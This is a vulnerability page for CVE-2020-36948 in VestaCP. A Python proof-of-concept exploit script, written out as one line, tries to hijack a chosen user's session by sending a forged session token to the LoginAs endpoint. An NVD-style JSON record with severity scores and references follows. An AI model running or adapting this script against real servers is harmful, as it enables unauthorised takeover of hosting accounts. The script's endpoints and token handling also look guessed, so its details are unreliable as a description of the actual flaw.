CVE-2020-36948

import requests import re # CVE-2020-36948 PoC - VestaCP LoginAs Session Token Vulnerability # Target: VestaCP <= 0.9.8-26 TARGET_URL = "http://target-vestacp-server:8083" TARGET_USER = "target_username" ATTACKER_TOKEN = "malicious_session_token" def exploit_loginas_vulnerability(): """ Exploit LoginAs module insufficient session token validation Steps: 1. Obtain valid session token (through various methods) 2. Manipulate token to impersonate target user 3. Bypass authentication via LoginAs module """ # Step 1: Initial request to obtain session session = requests.Session() login_url = f"{TARGET_URL}/login/" # Step 2: Craft malicious LoginAs request loginas_url = f"{TARGET_URL}/ajax/login-as-user/" headers = { "X-Requested-With": "XMLHttpRequest", "Cookie": f"PHPSESSID={ATTACKER_TOKEN}" } # Step 3: Exploit insufficient token validation payload = { "user": TARGET_USER, "token": ATTACKER_TOKEN, "action": "loginas" } response = session.post(loginas_url, data=payload, headers=headers) # Step 4: Extract authenticated session if response.status_code == 200 and "success" in response.text: print(f"[!] Successfully hijacked user: {TARGET_USER}") print(f"[*] Session cookie: {response.cookies.get_dict()}") return True return False def check_vulnerability(): """Check if target is vulnerable""" check_url = f"{TARGET_URL}/api/v1/check" try: response = requests.get(check_url, timeout=10) if "vestacp" in response.text.lower(): print("[*] VestaCP detected - may be vulnerable") return True except: pass return False if __name__ == "__main__": print("CVE-2020-36948 - VestaCP LoginAs Session Token Bypass") print("=" * 60) check_vulnerability()

{"cve": {"id": "CVE-2020-36948", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:12.213", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "VestaCP 0.9.8-26 contains a session token vulnerability in the LoginAs module that allows remote attackers to manipulate authentication tokens. Attackers can exploit insufficient token validation to access user accounts and perform unauthorized login requests without proper administrative permissions."}, {"lang": "es", "value": "VestaCP 0.9.8-26 contiene una vulnerabilidad de token de sesión en el módulo LoginAs que permite a atacantes remotos manipular tokens de autenticación. Los atacantes pueden explotar la validación insuficiente de tokens para acceder a cuentas de usuario y realizar solicitudes de inicio de sesión no autorizadas sin los permisos administrativos adecuados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://vestacp.com/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49219", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/vestacp-loginas-insufficient-session-validation", "source": "[email protected]"}, {"url": "https://www.vulnerability-lab.com/get_content.php?id=2240", "source": "[email protected]"}, {"url": "https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49219", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.vulnerability-lab.com/get_content.php?id=2240", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}, {"url": "https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}